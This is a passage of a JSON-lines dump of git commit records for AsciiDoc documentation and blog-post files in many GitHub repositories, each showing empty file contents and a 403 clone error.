<866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1b8d4d862d726b0e7111931283b025b9e877687","subject":"Create 2015-09-15-forge-2.19.1.final.asciidoc","message":"Create 2015-09-15-forge-2.19.1.final.asciidoc","repos":"luiz158\/docs,forge\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-09-15-forge-2.19.1.final.asciidoc","new_file":"news\/2015-09-15-forge-2.19.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1171a221bfac14f960c7a82ae738f6a29eac0c8f","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07bdf2aa4794145216a0a49c3188ef24246705a0","subject":"docs: perf: add actual version and timing data","message":"docs: perf: add actual version and timing data\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/perf-others.adoc","new_file":"docs\/perf-others.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b7d1fee897568ca958f54805577b2d9c93bfa36","subject":"Stub for documentation","message":"Stub for 
documentation\n","repos":"tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common","old_file":"baf\/baf.adoc","new_file":"baf\/baf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tisnik\/fabric8-analytics-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab913aba5fdc7d2207315818b3802ea7b6c3b04e","subject":"Update 2016-04-19-Converting-I-Pv6-to-Binary.adoc","message":"Update 2016-04-19-Converting-I-Pv6-to-Binary.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-Converting-I-Pv6-to-Binary.adoc","new_file":"_posts\/2016-04-19-Converting-I-Pv6-to-Binary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cb621ceb45919afcc76227b48d8a0d8b2d0f078","subject":"Add warning about how hstore extension should be installed.","message":"Add warning about how hstore extension should be installed.\n","repos":"djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf2ce14a3bbfbeeecb0b0316969565bf8e625dce","subject":"Update 2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","message":"Update 2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","new_file":"_posts\/2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07559b12d789f410a50868eb830d3734f922c87e","subject":"y2b create post How to make S'mores in the microwave.","message":"y2b create post How to make S'mores in the microwave.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-07-How-to-make-Smores-in-the-microwave.adoc","new_file":"_posts\/2013-06-07-How-to-make-Smores-in-the-microwave.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6615f84d460aab3e87b9b15069ba8218c435e94","subject":"Update 2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","message":"Update 
2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","repos":"jgornati\/jgornati.github.io,jgornati\/jgornati.github.io,jgornati\/jgornati.github.io","old_file":"_posts\/2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","new_file":"_posts\/2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jgornati\/jgornati.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48ddd7fb5273891812921c459a9f05bb7b6bde02","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39afadf7714d1651878d7d7d567b911151e174ce","subject":"Support the client side tests in the TCK. Record the request ID for when the queue use is improved.","message":"Support the client side tests in the TCK.\nRecord the request ID for when the queue use is improved.\n","repos":"microserviceux\/muon-java,volodymyrpavlenko\/muon-java,microserviceux\/muon-java","old_file":"muon-tck\/README.adoc","new_file":"muon-tck\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/volodymyrpavlenko\/muon-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b1af76fa4a29fc4e303d2be28fd810145886510","subject":"Update 2016-07-22-terzo-post-aggiunto.adoc","message":"Update 2016-07-22-terzo-post-aggiunto.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-terzo-post-aggiunto.adoc","new_file":"_posts\/2016-07-22-terzo-post-aggiunto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99e39066ceac2a642e0180e97f675bb232c26710","subject":"Update 2017-01-13-FUNDAMENTEL-RADIKAL.adoc","message":"Update 2017-01-13-FUNDAMENTEL-RADIKAL.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-13-FUNDAMENTEL-RADIKAL.adoc","new_file":"_posts\/2017-01-13-FUNDAMENTEL-RADIKAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29c0bb02d267ba1a9e9fd80edd6c67e24d2da817","subject":"Create memory.asciidoc","message":"Create memory.asciidoc","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"memory.asciidoc","new_file":"memory.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c5af947348c30a70c8257043f43f81c5d0e8a43","subject":"OS install graphics troubleshooting","message":"OS install graphics troubleshooting\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c77d22f9483618bd4dd51f8d071fe5b54b2482b","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94fe2c5c101d88a2b2b236c1172f1a029e8a66c0","subject":"Missing ;","message":"Missing ;\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Resources.adoc","new_file":"Best practices\/Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2c67d4f81d5d201234c2ae462ca4bcd9e29913f","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4725a12b3f65e2de18478b305a0fcc2a0baf3a9","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a187794ef83d30f26a66ad9749f6f0c307ba108","subject":"Added news folder","message":"Added news 
folder\n","repos":"agoncal\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2014-06-13-website.asciidoc","new_file":"news\/2014-06-13-website.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3e9e3fed0268b71468a79cf4943f566895a47825","subject":"Docs: Installation: clarify location of demo setup","message":"Docs: Installation: clarify location of demo setup\n\n\r\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49368c66c9ec90311d884ab5058011700ce0391b","subject":"Update 2013-07-07-Emberjs-query-parameters.adoc","message":"Update 2013-07-07-Emberjs-query-parameters.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-07-07-Emberjs-query-parameters.adoc","new_file":"_posts\/2013-07-07-Emberjs-query-parameters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9679dcda4588047c5fa2255e177d9493d324d0","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b9d8e88cbe040204fa61888e787f532513e041f","subject":"Update 2015-11-06-Yeah-About-that.adoc","message":"Update 2015-11-06-Yeah-About-that.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c156b42459b01a7293dcb18719001bdbb80b02","subject":"Update 2018-05-09-Test-blog-entry.adoc","message":"Update 2018-05-09-Test-blog-entry.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9863c6ea4500c24165eae408a395379594eebc7d","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a708b479c6b455f0daadb02af01d19fcc3aa7ec2","subject":"Update 2017-09-06-Mini.adoc","message":"Update 2017-09-06-Mini.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-06-Mini.adoc","new_file":"_posts\/2017-09-06-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6ac76971c69f68a620a5c9b66579b947084d59","subject":"Blog post: How lucky are your random seeds? (correction 2)","message":"Blog post: How lucky are your random seeds? (correction 2)\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5afd39e36c8c12655b373fc88818902b0145e60e","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b70881b09bada1301e75ca635bb1852af3f6af69","subject":"y2b create post The Golden Headphones","message":"y2b create post The Golden Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-20-The-Golden-Headphones.adoc","new_file":"_posts\/2016-05-20-The-Golden-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9861e38d31bcfed5ccd21750294ed7147e513fcf","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 
2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccb15b6563c82fd75eac60748195cc113f52e9d6","subject":"OGM-683 Improve MongoDB documentation (beginning of storage principles)","message":"OGM-683 Improve MongoDB documentation (beginning of storage principles)\n","repos":"ZJaffee\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,hferentschik\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"d5bf00e8059c6980be31714df36affae4c9d1117","subject":"y2b create post Canon S100 Unboxing \\u0026 Overview","message":"y2b create post Canon S100 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Canon-S100-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-01-06-Canon-S100-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f714c5739010108735e51a5e8321699077d9aaf","subject":"Update 2016-03-15-Hello-World.adoc","message":"Update 2016-03-15-Hello-World.adoc","repos":"nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io","old_file":"_posts\/2016-03-15-Hello-World.adoc","new_file":"_posts\/2016-03-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nickwanhere\/nickwanhere.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915f126d1ec0043a43d9954421c866fdecd578d4","subject":"HLS-LFCD LDS 
Sensor","message":"HLS-LFCD LDS Sensor\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Ros Gazebo\/README.adoc","new_file":"Ros Gazebo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"713f0b1f6c6e79cc36073f6a9ffb4d1df79f05d9","subject":"Update 2017-08-26-Kotlin.adoc","message":"Update 2017-08-26-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-26-Kotlin.adoc","new_file":"_posts\/2017-08-26-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc8dca32eee5f860515637143cba0232ad2a67c3","subject":"Update 2019-11-29-to-you.adoc","message":"Update 2019-11-29-to-you.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-29-to-you.adoc","new_file":"_posts\/2019-11-29-to-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1390930b073f99d6aa79fbf9feef92035611e05","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0acaf15af151b3256edf5f675999a50a3dbdc615","subject":"Update 2018-03-25-Whats-up-Flutter-March-2018.adoc","message":"Update 2018-03-25-Whats-up-Flutter-March-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc","new_file":"_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3eb36388221649935a1f3e722103013f111c309","subject":"Link directly to the attachments in arrays section","message":"Link directly to the attachments in arrays section\n\nThe link should be made to the relevant section of the ingest attachments documentation, rather than the top of the 
page.","repos":"GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,lks21c\/elasticsearch,wuranbo\/elasticsearch,JackyMai\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,Helen-Zhao\/elasticsearch,mohit\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,JackyMai\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,nezirus\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,Shepard1212\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,